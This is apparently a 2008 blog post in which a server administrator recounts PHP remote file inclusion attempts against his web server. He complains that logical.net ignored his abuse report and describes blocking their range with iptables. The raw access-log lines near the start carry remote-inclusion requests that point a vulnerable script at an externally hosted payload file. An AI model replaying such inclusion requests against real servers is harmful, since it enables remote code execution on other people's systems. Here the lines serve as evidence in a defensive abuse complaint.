I merely meant to be helpful when I took the time to notify logical.net of a compromised server possibly running an unpatched cPanel version that was hitting one of the servers I adminster with attempts at php remote inclusions:

209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 217 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET /category//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 227 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET /category/spam/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 235 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:31 +0100] “GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 232 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:56:17 +0100] “GET /failed-blogspam-automation-from-china//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 256 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:56:17 +0100] “GET /failed-blogspam-automation-from-china/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 259 “-” “Mozilla/5.0″

209.23.116.97 has a PTR record of cpanel.acmenet.net, which looks quite telling in my opinion.

When looking up the address, I noticed that logical net did not differentiate between ranges for Internet service to endusers and webhosting, so unless you scan PTR records you may have no way of telling them apart, just one block for everything:

OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US

NetRange: 209.23.0.0 – 209.23.127.255
CIDR: 209.23.0.0/17
NetName: LNET-A
NetHandle: NET-209-23-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LOGICAL.NET
NameServer: NS2.LOGICAL.NET
NameServer: NS3.LOGICAL.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-12
Updated: 2001-05-30

Nor could their routing give any more hints (sometimes it does):

route: 209.23.0.0/17
origin: AS3931
descr: LOGICAL – Logical Net Corporation
lastupd-frst: 2008-11-14 00:00Z 80.81.192.106@rrc12
lastupd-last: 2008-12-08 03:29Z 145.125.80.5@rrc00
seen-at: rrc00,rrc01,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 96
source: RISWHOIS

According to whois, they at least have an abuse address and one is tempted to think, that it would be added for a reason other than looking “anti-spam”. As I soon had to discover right after having sent my abuse report, this does not seem to be the case with logical.net. Here is the automatically ignore bot reply I instantly received from them:

From: “Support” <support @ logical.net>
To: [some address]@gmail.com
Reply-To: support @ logical.net
Subject: Registration Required: Unable to create Ticket
Date: Mon, 08 Dec 2008 06:48:35 -0500
X-Mailer: Kayako eSupport v3.20.02

Your ticket has not been accepted into the system. You are required to register at the following URL to submit any issues via Email: help.logical.net/index.php?_m=core&_a=register If you already have a registered account under a different email address you may log into our ticketing system Here: http://help.logical.net/

Once registered, you will be able to submit any issues directly by sending us Email. We are sorry for any inconvenience this may have caused.

Support

Note that I did write to abuse and got a reply from support instead. However, I did not ask for their help, as I already know how to adjust my defences in order to rid myself of neglegent, ignorant or even malicious network owners. I merely sent out a courtesy notice as I figured a compromised cPanel may be some kind of desaster for those who maintain their servers/domains with it. But apparently I was mistaken. Do Logical.net really believe to be so special that I happily would jump through their hoops just to notify them of their own negligence (notice the absurdity)? I can’t believe anyone right in one’s mind would cherish such a crazy notion, therefore I conclude third party notifications are not desired by logical.net, which is their right (aka their network, their rules). As it is mine to refuse traffic coming from their direction.

How to block them accessing my webservers without affecting innocent dial-up or DSL users? I spent some time looking up PTR records and noticed that the /24 which the compromised machine is part of, is exclusively populated by servers, mainly mailservers, but some webservers, too. The same applies to the neighbouring /24 so I resolved the problem by adding the following entry to both my mail- and webservers:

# logical.net do not wish to receive abuse reports
iptables -A INPUT -s 209.23.116.0/23 -i eth0 -p tcp -m tcp --syn -j REJECT

This way, if one of their mailservers should suddenly opt for spewing spams, I have the piece of mind of not being confronted with it. Or think of a moronic implementation of some autoresponder or challenge/response system which could be abused by spammers for hitting innocent bystanders with tons of backscatter.